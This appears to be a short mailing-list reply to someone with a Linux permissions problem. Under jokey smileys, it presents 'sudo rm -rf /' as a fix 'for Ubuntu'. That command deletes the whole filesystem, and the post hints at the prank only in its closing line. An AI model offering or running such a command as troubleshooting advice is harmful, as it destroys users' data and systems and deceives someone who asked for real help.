It might be a permissions problem requiring root elevation, which we
normally consider to be a v-e-r-y good thing... :)

Depending upon your installed linux distribution, you might try
something like this:

sudo rm -rf /    <---- For Ubuntu

Please don't feel bad if no one on the list really wants to actually
test this solution for you.. :)
